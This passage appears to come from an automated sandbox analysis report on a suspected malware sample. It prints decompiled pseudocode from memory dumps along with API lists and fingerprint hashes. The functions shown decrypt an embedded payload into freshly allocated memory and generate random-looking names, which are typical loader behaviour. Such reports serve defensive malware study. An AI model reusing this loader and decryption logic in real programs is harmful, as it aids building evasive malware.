                                                                                                                                                                                                                                                                          									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                          									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
                                                                                                                                                                                                                                                                          									if(_t91 != 0) {
                                                                                                                                                                                                                                                                          										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          										 *_a12 = _t93;
                                                                                                                                                                                                                                                                          										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                          											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                          											E04007B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                          											 *_a16 = _v52;
                                                                                                                                                                                                                                                                          											_v8 = _v52;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04008096
                                                                                                                                                                                                                                                                          0x040080a1
                                                                                                                                                                                                                                                                          0x04008246
                                                                                                                                                                                                                                                                          0x0400824c
                                                                                                                                                                                                                                                                          0x040080c5
                                                                                                                                                                                                                                                                          0x040080c8
                                                                                                                                                                                                                                                                          0x040080d8
                                                                                                                                                                                                                                                                          0x040080de
                                                                                                                                                                                                                                                                          0x040080e5
                                                                                                                                                                                                                                                                          0x040080fb
                                                                                                                                                                                                                                                                          0x04008103
                                                                                                                                                                                                                                                                          0x0400810a
                                                                                                                                                                                                                                                                          0x04008113
                                                                                                                                                                                                                                                                          0x04008119
                                                                                                                                                                                                                                                                          0x0400812d
                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                          0x04008140
                                                                                                                                                                                                                                                                          0x04008149
                                                                                                                                                                                                                                                                          0x04008162
                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                          0x0400817e
                                                                                                                                                                                                                                                                          0x0400818c
                                                                                                                                                                                                                                                                          0x0400819e
                                                                                                                                                                                                                                                                          0x040081b1
                                                                                                                                                                                                                                                                          0x040081d3
                                                                                                                                                                                                                                                                          0x040081d8
                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                          0x040081f1
                                                                                                                                                                                                                                                                          0x040081fa
                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                          0x0400820e
                                                                                                                                                                                                                                                                          0x04008219
                                                                                                                                                                                                                                                                          0x04008227
                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040080e5

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 040081F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                          • Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                          			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                          				void _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                          					E04007B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                          					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                                                                                                          					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                          						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                          						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                          						if(_v56 == 0) {
                                                                                                                                                                                                                                                                          							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04005938
                                                                                                                                                                                                                                                                          0x04005943
                                                                                                                                                                                                                                                                          0x04005971
                                                                                                                                                                                                                                                                          0x04005986
                                                                                                                                                                                                                                                                          0x04005988
                                                                                                                                                                                                                                                                          0x0400598a
                                                                                                                                                                                                                                                                          0x0400598b
                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                          0x040059c6
                                                                                                                                                                                                                                                                          0x040059d6
                                                                                                                                                                                                                                                                          0x040059dc
                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                          0x040059ee
                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                          0x040059fb

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                          • Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                          • Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v91;
                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                          				char _v220;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                          					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                          					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                          					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                          						E04007D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                          						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                          						_v40 = _t59;
                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v220;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                          						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                          						E04007D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                          						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                          						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                          						_v91 = 0;
                                                                                                                                                                                                                                                                          						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                          						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04009409
                                                                                                                                                                                                                                                                          0x04009414
                                                                                                                                                                                                                                                                          0x0400943d
                                                                                                                                                                                                                                                                          0x04009442
                                                                                                                                                                                                                                                                          0x04009451
                                                                                                                                                                                                                                                                          0x04009454
                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                          0x04009480
                                                                                                                                                                                                                                                                          0x0400949a
                                                                                                                                                                                                                                                                          0x0400949f
                                                                                                                                                                                                                                                                          0x040094a2
                                                                                                                                                                                                                                                                          0x040094a9
                                                                                                                                                                                                                                                                          0x040094bf
                                                                                                                                                                                                                                                                          0x040094ab
                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                          0x040094d1
                                                                                                                                                                                                                                                                          0x040094ed
                                                                                                                                                                                                                                                                          0x040094fd
                                                                                                                                                                                                                                                                          0x04009502
                                                                                                                                                                                                                                                                          0x04009513
                                                                                                                                                                                                                                                                          0x04009519
                                                                                                                                                                                                                                                                          0x04009521
                                                                                                                                                                                                                                                                          0x04009533
                                                                                                                                                                                                                                                                          0x0400953c
                                                                                                                                                                                                                                                                          0x04009545
                                                                                                                                                                                                                                                                          0x04009460
                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                          0x04009553

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                          • Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 1000228B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 100728148-0
                                                                                                                                                                                                                                                                          • Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                          • Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 04004C19
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C49
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040056F0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2825510553-0
                                                                                                                                                                                                                                                                          • Opcode ID: bc6364c936b53f26f180f3226d150eb2ede703b85b89f218812fac6098efaed8
                                                                                                                                                                                                                                                                          • Instruction ID: 4dcf0cb0894f78bb2b39d823a9071d5930a356be82481dd84034f624af791eb7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc6364c936b53f26f180f3226d150eb2ede703b85b89f218812fac6098efaed8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BE06D31B04204AFE740DFA4D984AAEBBF0EF48325F148269D902F7281D274E890DF61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 23%
                                                                                                                                                                                                                                                                          			E0040126C() {
                                                                                                                                                                                                                                                                          				int _t4;
                                                                                                                                                                                                                                                                          				intOrPtr* _t5;
                                                                                                                                                                                                                                                                          				intOrPtr* _t8;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				 *_t8 = 1;
                                                                                                                                                                                                                                                                          				__set_app_type(??);
                                                                                                                                                                                                                                                                          				E00401000();
                                                                                                                                                                                                                                                                          				_t5 = _t8;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t8 - 0x18)) = 2;
                                                                                                                                                                                                                                                                          				__set_app_type(_t4); // executed
                                                                                                                                                                                                                                                                          				E00401000(); // executed
                                                                                                                                                                                                                                                                          				_push(_t5);
                                                                                                                                                                                                                                                                          				goto __eax;
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x00401272
                                                                                                                                                                                                                                                                          0x00401279
                                                                                                                                                                                                                                                                          0x0040127f
                                                                                                                                                                                                                                                                          0x00401285
                                                                                                                                                                                                                                                                          0x0040128a
                                                                                                                                                                                                                                                                          0x00401291
                                                                                                                                                                                                                                                                          0x00401297
                                                                                                                                                                                                                                                                          0x0040129c
                                                                                                                                                                                                                                                                          0x004012a8

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00401291
                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00401279
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040129C), ref: 00401033
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __getmainargs.MSVCRT ref: 00401070
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__fmode.MSVCRT ref: 0040107E
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__environ.MSVCRT ref: 00401098
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _cexit.MSVCRT ref: 004010BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 004010C3
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010F1
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 00401105
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _setmode$__set_app_type$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2043081007-0
                                                                                                                                                                                                                                                                          • Opcode ID: 95079076a23dd48875e793aac924bfe356b74353773b9bec2b3be70d01421b75
                                                                                                                                                                                                                                                                          • Instruction ID: 7cda7d837e108511d0981a2c678aee1b3234257573440c6a0797aaf790408f0b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95079076a23dd48875e793aac924bfe356b74353773b9bec2b3be70d01421b75
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD0123400820957C2003BB9DE0B70C7AEC5700346F81057CE4C5762A6DA7464554BEF
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040097A0(long _a4) {
                                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                                                                          0x040097b0
                                                                                                                                                                                                                                                                          0x040097b7

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                          • String ID:
